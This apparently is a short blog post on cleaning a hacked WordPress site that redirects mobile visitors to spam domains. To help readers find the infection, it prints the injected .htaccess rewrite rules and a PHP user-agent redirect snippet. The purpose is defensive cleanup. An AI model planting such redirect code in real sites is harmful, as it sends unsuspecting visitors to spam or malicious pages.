Cleaning an hacked WordPress from virus that on mobile redirects to a spam page
Scenario: when you navigate to a WordPress site from mobile devices it redirects to some spam shitty pages (i.e. http://luxurytds.com, http://load-app.org, …).
Solution 1: infected .htaccess files
First, check your .htaccess file in the website root, you could find at the top of the file some lines, like:
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal ...
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s ...
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]
Remove them, or, to be really sure, delete the .htaccess file and upload the original file from your local backup.
Secondly, you could find some other .htaccess file in /wp-admin
, /wp-content
, /wp-includes
and also in the folders of the domain root (i.e. /public
, /private
). Delete them.
Solution 2: infected index.php files
As Codex says:
For instance, malicious redirects can often be found in files like .htaccess, and index.php at the root of your website. While others will focus on the
wp-content/themes
directory targetingindex.php
,header.php
,footer.php
andfunctions.php
. These are the more simple variations ofcourse.
the hack could have infected various files (mostly index.php)
in your WP installation with code like this:
<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://mob-version.ru/");
die();
}
?>
Remove the malicious code or, as said, overwrite the whole file with your clean local file. Overwriting these infected files could be a problem because the “hackers” setted permission 444. Then, remove the infected file and re-upload it.
Notice: In both cases, eventually, flush the permalinks from WordPress > Settings > Permalinks > Save Changes
References
http://doktor-andy.de/wordpress/?p=799
http://wordpress.org/support/topic/problems-viewing-site-on-mobile-iphone-htaccess-related
http://codex.wordpress.org/FAQ_My_site_was_hacked
-
mekatronikmuhendisligi
-
Rahul R